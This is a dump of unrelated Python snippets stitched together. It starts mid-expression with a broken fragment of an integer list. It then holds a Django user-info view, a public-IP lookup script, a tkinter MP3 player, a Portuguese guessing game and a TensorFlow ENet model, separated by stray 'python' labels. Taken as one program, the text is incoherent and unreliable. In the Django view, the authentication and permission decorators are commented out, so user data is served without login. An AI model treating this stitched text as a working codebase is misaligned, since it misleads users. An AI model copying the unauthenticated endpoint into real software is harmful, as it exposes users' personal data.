1701, -9631, -5545, -5070, 2562, -7374, 5553, -5712, 9640, -3967, -9653, -8201, 1065, 8112, -68, 7836, 9707, 3491, -1091, -6089, 6055, 3646, -8199, 4653, -1345, 4693, -698, 6622, 5838, -4299, 9166, -6125, 7709, -5094, -3823, -6838, -8223, 9726, -1796, 9495, 5776, 7576, 2777, 751, 493, 2770, 1161, 9269, -9357, -6066, -8382, -7763, 3247, -249, 5494, 1324, -5611, 1602, -3849, 7539, 5290, -3859, 8617, 6201, -5349, 2450, 2730, 5361, -3119, -4996, -3954, -7018, -3590, 5559, -9706, 2429, 4993, 2461, 8591, 9266, -8253, 6979, 7880, -7738, -6465, 4140, 4209, 5278, 5318, -8771, 5831, 9500, 6750, 5736, 9717, 466, -8383, 5713, 8822, -3305, 2839, -774, 4427, 8962, -8693, -6294, 6510, 5469, -6665, 2205, -1038, 2464, 162, -6595, -2480, -9316, 6656, 3494, -9844, -6351, 8312, 6161, -1657, -9185, 6412, 4653, -6076, 6088, -4571, 1652, 323, 1937, 1478, 8124, -422, -2631, 2720, -4944, 8270, 2829, -2098, -932, 1201, -3717, 8991, 932, 718, -4135, 3712, 9620, -8351, 3881, 7865, -7652, 8485, -6904, -1993, -121, -5173, 5867, 2310, -1908, 8103, 6182, -5321, -9562, -2189, 7669, -3832, 8487, 2565, 6382, 5576, -3068, -5091, -9233, 3253, -1805, -3150, -2287, -1249, 8289, -3604, 6512, 7958, 8531, 6573, -9696, 7698, 4755, 5089, -7234, -4705, 1122, 9377, -8683, -8274, -1704, -9941, 1766, 1636, -7545, 7171, 2124, -7366, 7973, 2244, 6882, 7230, 4327, -2430, -1701, 9117, 9699, 6726, -2278, -788, 9359, -2308, 6249, 8002, -7658, -5281, -2121, 4872, 126, 6369, 7443, 7813, -8326, -9467, 8879, -5791, 2888, 3835, 6280, -8876, -5534, -949, 5332, 2559, 3274, -6547, -6310, 6461, -7158, -5007, -9252, 8240, -6738, -6484, -5857, -4892, 555, -8014, -2629, 2318, -1235, 4846, -1618, -1970, 596, -600, -2542, -6107, -3066, -6802, -5773, -9134, 9182, 6792, 7575, 1802, 2275, -1991, -2271, -9520, 7951, 5598, 8089, -5159, -4168, -5510, -2127, 3531, -3065, -685, -2027, -8775, 9577, 4525, -1265, -1296, 3066, 1223, 9614, -150, 4866, -6665, 8184, 4774, -8038, 9339, 6452, -8316, -9043, -1982, 5428, -424, -8287, -9247, 9961, 2987, 4146, -5853, -8877, 812, -8928, -209, 4608, -7533, 4599, -4911, 443, 4149, 7493, 8657, -1412, 4965, -4399, 2163, -785, -6391, 5965, -1863, -5577, -9460, 7953, -8286, 6916, 2685, -2035, 6389, -1883, 3244, -1387, 197, -4757, 5403, -4907, -9135, 9903, 7013, 8202, 5905, -8477, -1242, -720, 6571, -7611, 2799, -7928, -6703, 8424, 3814, -2255, -7835, 8800, -4959, 968, 7071, -8181, 1505, -8102, -7375, -759, -1356, -8300, 4065, 1050, 5892, -7840, 9162, 8176, -3376, -2038, -4830, -2152, -857, 2262, 9436, 7920, 1845, 4977, 3282, -2782, 1751, -2436, -311, 9635, -9256, 8532, 2926, -3560, 3285, -4808, -2535, -408, 4570, -4284, 1813, 414, -6474, 1469, -9457, -2925, 178, -4673, -8458, -3136, 4306, 8611, -6467, 8884, 844, 7820, -8859, -4457, 6967, 8350, -9626, -2092, 6446, -68, -9188, 9695, -1542, 9781, -3129, -4665, -6887, -6306, -7407, -8425, -8042, 4860, -1142, 5698, 3718, 8018, -8998, -5819, 2090, -5924, 1368, -9725, 4829, 9898, -2378, -8216, -9563, 9072, 5163, -2924, -9521, -4348, -1755, 6865, 5077, 330, 8497, 967, -1957, -8276, -6991, 5907, 8247, -477, 4518, 3125, 1547, 9597, 376, -4482, -7920, -3099, 4033, 9484, 1451, 592, 301, 8593, 697, 6525, -6717, 5739, 7705, -2939, 6698, -3615, 4289, -790, -6611, -3816, -9452, 2461, -5813, -298, 1595, 8882, -6198, -3236, -2533, 1305, -2669, -6043, 2596, -4411, -7858, 7994, -4318, 1225, 2946, 2731, -6192, 7305, -7406, -5395, -6719, 8300, -8384, 2061, 1192, -4434, -3178], -8645))
python
from django.shortcuts import render from utils.api_response import JsonResponse from rest_framework.decorators import (api_view, authentication_classes, permission_classes) from rest_framework_jwt.authentication import JSONWebTokenAuthentication from rest_framework.permissions import IsAuthenticated @api_view(['GET']) # @authentication_classes((JSONWebTokenAuthentication, )) # @permission_classes((IsAuthenticated, )) def user_info(request): """ 获取用户信息 """ result = {} result['nickname'] = 'karl' result['avatar'] = 'avatar' result['mobile'] = '138000000' return JsonResponse(data=result)
python
import re import logging import socket import json from urllib import request, error, parse # 匹配合法 IP 地址 regex_ip = re.compile( r"\D*(" + r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\." + r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\." + r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\." + r"(?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)" + r")\D*") # 增强鲁棒性,用多种方式获取 IP def get_ip(): return (get_ip_by_taobao() or get_ip_by_ipip() or get_ip_by_httpbin() or get_ip_by_httpbin_direct_1() ) # 这几个函数会在 DNS 遭受污染时失效 def get_ip_by_taobao(): url = 'http://ip.taobao.com/service/getIpInfo.php?ip=myip' try: resp = request.urlopen(url=url, timeout=10).read() jsonBody = json.loads(resp.decode("utf-8")) ip = jsonBody['data']['ip'] logging.info("get ip by taobao: %s" % ip) return ip except Exception as e: logging.warning("get_ip_by_taobao FAILED, error: %s", str(e)) return None def get_ip_by_ipip(): url = 'http://myip.ipip.net/' try: resp = request.urlopen(url=url, timeout=10).read() ip = regex_ip.match(resp.decode("utf-8")).group(1) logging.info("get ip by ipip: %s" % ip) return ip except Exception as e: logging.warning("get_ip_by_ipip FAILED, error: %s", str(e)) return None def get_ip_by_httpbin(): url = 'http://www.httpbin.org/ip' try: resp = request.urlopen(url=url, timeout=10).read() ip = regex_ip.match(resp.decode("utf-8")).group(1) logging.info("get ip by httpbin: %s" % ip) return ip except Exception as e: logging.warning("get_ip_by_httpbin FAILED, error: %s", str(e)) return None # 这个函数可以在本地 DNS 遭受污染的时候获取到IP # 如需模拟DNS污染,可以在HOSTS文件里加入 127.0.0.1 www.httpbin.org def get_ip_by_httpbin_direct_1(): url = 'http://52.201.109.155/ip' try: req = request.Request(url=url, method='GET', headers={'Host': 'www.httpbin.org'}) resp = request.urlopen(req).read() ip = regex_ip.match(resp.decode("utf-8")).group(1) logging.info("get ip by httpbin_direct_1: %s" % ip) return ip except Exception as e: logging.warning("get_ip_by_httpbin_direct_1 FAILED, error: %s", str(e)) return None # 测试 if __name__ == '__main__': print(get_ip() ) print(get_ip_by_taobao() ) print(get_ip_by_ipip() ) print(get_ip_by_httpbin() ) print(get_ip_by_httpbin_direct_1() )
python
from tkinter import * from tkinter import filedialog from pygame import mixer import os import stagger class MusicPlayer: filename = "MUSIC NAME" def __init__(self, window): window.geometry('500x400') window.title('MP3 Player') window.resizable(1, 1) Load = Button(window, text='Load Music', width=10, font=('Times', 10), command=self.load) Play = Button(window, text='Play', width=10, font=('Times', 10), command=self.play) Pause = Button(window, text='Pause', width=10, font=('Times', 10), command=self.pause) Stop = Button(window, text='Stop', width=10, font=('Times', 10), command=self.stop) self.label = Label(window, text=MusicPlayer.filename, font=('Times', 20), width=25) self.label.place(x=60, y=10) Load.place(x=200, y=160) Play.place(x=200, y=120) Pause.place(x=310, y=120) Stop.place(x=90, y=120) self.music_file = False self.playing_state = False def load(self): MusicPlayer.filename = filedialog.askopenfilename() self.music_file = True self.play() def play(self): if self.music_file: mixer.init() mixer.music.load(MusicPlayer.filename) mixer.music.play() mp3 = stagger.read_tag(MusicPlayer.filename) self.label['text'] = os.path.basename(MusicPlayer.filename) def pause(self): if not self.playing_state: mixer.music.pause() self.playing_state = True else: mixer.music.unpause() self.playing_state = False def stop(self): mixer.music.stop() root = Tk() Photo = PhotoImage(file="icon.png") root.iconphoto(False, Photo) app = MusicPlayer(root) root.mainloop()
python
import random from time import sleep lista = [0,1,2,3,4,5] aleatorio = random.choice(lista) print(20*'=') print(" JOGO DA ADIVINHAÇÃO") print(20*'=') escolha = int(input("Digite um numero de 0 a 5: ")) print('PROCESSANDO...') sleep(4) if escolha == aleatorio: print('O numero era {} e você escolheu correto.'.format(aleatorio)) else: print('O numero era {} e você errou'.format(aleatorio)) print(20*'=')
python
import tensorflow as tf from tensorflow.keras import Model from . import enet_modules as mod class ENet(Model): """ https://arxiv.org/pdf/1606.02147.pdf """ def __init__(self, classes, kernel_initializer=tf.initializers.glorot_uniform(), alpha_initializer=tf.initializers.constant(0.25), weight_regularization=None, # tf.keras.regularizers.l2(2e-4), regularization_scaling=False, drop_rates=[0.01, 0.1, 0.1, 0.1, 0.1], name="ENet"): """ :param classes: number of output classes :param weight_initialization: conv weight initialization scheme :param weight_regularization: weight parameter regularization :param regularization_scaling: scale regularization constant according to initialization scheme :param alpha_initializer: PReLU weight initialization scheme :param name: name of model scope """ if len(drop_rates) != 5: raise ValueError( "Illegal argument value @drop_rates, length must be 5." ) self.classes = classes super(ENet, self).__init__(name=name) # Define all layers as in the paper self.Initial = mod.Initial( 16, name="Initial", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling ) # Stage 1 self.Bottleneck1_0 = mod.BottleneckDownsample( 64, name="Bottleneck1_0", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[0]) self.Bottleneck1_1 = mod.Bottleneck( 64, name="Bottleneck1_1", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[0]) self.Bottleneck1_2 = mod.Bottleneck( 64, name="Bottleneck1_2", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[0]) self.Bottleneck1_3 = mod.Bottleneck( 64, name="Bottleneck1_3", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[0]) self.Bottleneck1_4 = mod.Bottleneck( 64, name="Bottleneck1_4", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[0]) # Stage 2 self.Bottleneck2_0 = mod.BottleneckDownsample( 128, name="Bottleneck2_0", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_1 = mod.Bottleneck( 128, name="Bottleneck2_1", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_2 = mod.Bottleneck( 128, name="Bottleneck2_2", dilation_rate=(2,2), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_3 = mod.Bottleneck( 128, name="Bottleneck2_3", asymmetric=True, kernel_size=(5,5), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_4 = mod.Bottleneck( 128, name="Bottleneck2_4", dilation_rate=(4,4), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_5 = mod.Bottleneck( 128, name="Bottleneck2_5", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_6 = mod.Bottleneck( 128, name="Bottleneck2_6", dilation_rate=(8,8), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_7 = mod.Bottleneck( 128, name="Bottleneck2_7", asymmetric=True, kernel_size=(5,5), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) self.Bottleneck2_8 = mod.Bottleneck( 128, name="Bottleneck2_8", dilation_rate=(16,16), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[1]) # Stage 3 self.Bottleneck3_1 = mod.Bottleneck( 128, name="Bottleneck3_1", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) self.Bottleneck3_2 = mod.Bottleneck( 128, name="Bottleneck3_2", dilation_rate=(2,2), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) self.Bottleneck3_3 = mod.Bottleneck( 128, name="Bottleneck3_3", asymmetric=True, kernel_size=(5,5), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) self.Bottleneck3_4 = mod.Bottleneck( 128, name="Bottleneck3_4", dilation_rate=(4,4), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) self.Bottleneck3_5 = mod.Bottleneck( 128, name="Bottleneck3_5", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) self.Bottleneck3_6 = mod.Bottleneck( 128, name="Bottleneck3_6", dilation_rate=(8,8), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) self.Bottleneck3_7 = mod.Bottleneck( 128, name="Bottleneck3_7", asymmetric=True, kernel_size=(5,5), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) self.Bottleneck3_8 = mod.Bottleneck( 128, name="Bottleneck3_8", dilation_rate=(16,16), kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[2]) # Stage 4 self.Bottleneck4_0 = mod.BottleneckUpsample( 64, name="Bottleneck4_0", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[3]) self.Bottleneck4_1 = mod.Bottleneck( 64, name="Bottleneck4_1", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[3]) self.Bottleneck4_2 = mod.Bottleneck( 64, name="Bottleneck4_2", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[3]) # Stage 5 self.Bottleneck5_0 = mod.BottleneckUpsample( 16, name="Bottleneck5_0", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[4]) self.Bottleneck5_1 = mod.Bottleneck( 16, name="Bottleneck5_1", kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling, drop_rate=drop_rates[4]) # Final UpConv self.Final = mod.Final(self.classes, kernel_initializer=kernel_initializer, alpha_initializer=alpha_initializer, kernel_regularizer=weight_regularization, regularization_scaling=regularization_scaling) def build(self, input_shape): """ Store the absolute name scopes used in @call to enable scope reuse. """ if self.built: return # Save name scopes with tf.name_scope("Stage1") as scope: self._stage1_scope = scope with tf.name_scope("Stage2") as scope: self._stage2_scope = scope with tf.name_scope("Stage3") as scope: self._stage3_scope = scope with tf.name_scope("Stage4") as scope: self._stage4_scope = scope with tf.name_scope("Stage5") as scope: self._stage5_scope = scope try: # Temporarily disable checkpointable attr tracking self._setattr_tracking = False # Initialize output lists self.initial = [] self.bottleneck1_0 = [] self.bottleneck1_1 = [] self.bottleneck1_2 = [] self.bottleneck1_3 = [] self.bottleneck1_4 = [] self.bottleneck2_0 = [] self.bottleneck2_1 = [] self.bottleneck2_2 = [] self.bottleneck2_3 = [] self.bottleneck2_4 = [] self.bottleneck2_5 = [] self.bottleneck2_6 = [] self.bottleneck2_7 = [] self.bottleneck2_8 = [] self.bottleneck3_1 = [] self.bottleneck3_2 = [] self.bottleneck3_3 = [] self.bottleneck3_4 = [] self.bottleneck3_5 = [] self.bottleneck3_6 = [] self.bottleneck3_7 = [] self.bottleneck3_8 = [] self.bottleneck4_0 = [] self.bottleneck4_1 = [] self.bottleneck4_2 = [] self.bottleneck5_0 = [] self.bottleneck5_1 = [] self.final = [] finally: self._setattr_tracking = True self.built = True @property def endpoint_outputs(self): """ Returns all endpoint outputs, i.e. all scales from Stage 3 to final logits. """ return list(map(list, zip(self.final, self.bottleneck5_1, self.bottleneck4_2, self.bottleneck3_8))) def call(self, inputs, training): """ Implements the __call__ building functionality, interconnecting the network modules. :param inputs: input tensor (4D tf.Tensor - NHWC) :param training: build for training of inference :returns: network logits :rtype: tf.Tensor """ initial = self.Initial(inputs, training) with tf.name_scope(self._stage1_scope): # Stage 1 bottleneck1_0, argmax1 = self.Bottleneck1_0(initial, training) bottleneck1_1 = self.Bottleneck1_1(bottleneck1_0, training) bottleneck1_2 = self.Bottleneck1_2(bottleneck1_1, training) bottleneck1_3 = self.Bottleneck1_3(bottleneck1_2, training) bottleneck1_4 = self.Bottleneck1_4(bottleneck1_3, training) with tf.name_scope(self._stage2_scope): # Stage 2 bottleneck2_0, argmax2 = self.Bottleneck2_0(bottleneck1_4, training) bottleneck2_1 = self.Bottleneck2_1(bottleneck2_0, training) bottleneck2_2 = self.Bottleneck2_2(bottleneck2_1, training) bottleneck2_3 = self.Bottleneck2_3(bottleneck2_2, training) bottleneck2_4 = self.Bottleneck2_4(bottleneck2_3, training) bottleneck2_5 = self.Bottleneck2_5(bottleneck2_4, training) bottleneck2_6 = self.Bottleneck2_6(bottleneck2_5, training) bottleneck2_7 = self.Bottleneck2_7(bottleneck2_6, training) bottleneck2_8 = self.Bottleneck2_8(bottleneck2_7, training) with tf.name_scope(self._stage3_scope): # Stage 3 bottleneck3_1 = self.Bottleneck3_1(bottleneck2_8, training) bottleneck3_2 = self.Bottleneck3_2(bottleneck3_1, training) bottleneck3_3 = self.Bottleneck3_3(bottleneck3_2, training) bottleneck3_4 = self.Bottleneck3_4(bottleneck3_3, training) bottleneck3_5 = self.Bottleneck3_5(bottleneck3_4, training) bottleneck3_6 = self.Bottleneck3_6(bottleneck3_5, training) bottleneck3_7 = self.Bottleneck3_7(bottleneck3_6, training) bottleneck3_8 = self.Bottleneck3_8(bottleneck3_7, training) with tf.name_scope(self._stage4_scope): # Stage 4 bottleneck4_0 = self.Bottleneck4_0(bottleneck3_8, argmax2, training) bottleneck4_1 = self.Bottleneck4_1(bottleneck4_0, training) bottleneck4_2 = self.Bottleneck4_2(bottleneck4_1, training) with tf.name_scope(self._stage5_scope): # Stage 5 bottleneck5_0 = self.Bottleneck5_0(bottleneck4_2, argmax1, training) bottleneck5_1 = self.Bottleneck5_1(bottleneck5_0, training) final = self.Final(bottleneck5_1) # Add layer outputs to respective lists self.initial.append(initial) self.bottleneck1_0.append(bottleneck1_0) self.bottleneck1_1.append(bottleneck1_1) self.bottleneck1_2.append(bottleneck1_2) self.bottleneck1_3.append(bottleneck1_3) self.bottleneck1_4.append(bottleneck1_4) self.bottleneck2_0.append(bottleneck2_0) self.bottleneck2_1.append(bottleneck2_1) self.bottleneck2_2.append(bottleneck2_2) self.bottleneck2_3.append(bottleneck2_3) self.bottleneck2_4.append(bottleneck2_4) self.bottleneck2_5.append(bottleneck2_5) self.bottleneck2_6.append(bottleneck2_6) self.bottleneck2_7.append(bottleneck2_7) self.bottleneck2_8.append(bottleneck2_8) self.bottleneck3_1.append(bottleneck3_1) self.bottleneck3_2.append(bottleneck3_2) self.bottleneck3_3.append(bottleneck3_3) self.bottleneck3_4.append(bottleneck3_4) self.bottleneck3_5.append(bottleneck3_5) self.bottleneck3_6.append(bottleneck3_6) self.bottleneck3_7.append(bottleneck3_7) self.bottleneck3_8.append(bottleneck3_8) self.bottleneck4_0.append(bottleneck4_0) self.bottleneck4_1.append(bottleneck4_1) self.bottleneck4_2.append(bottleneck4_2) self.bottleneck5_0.append(bottleneck5_0) self.bottleneck5_1.append(bottleneck5_1) self.final.append(final) self.outputs.append(final) return final
python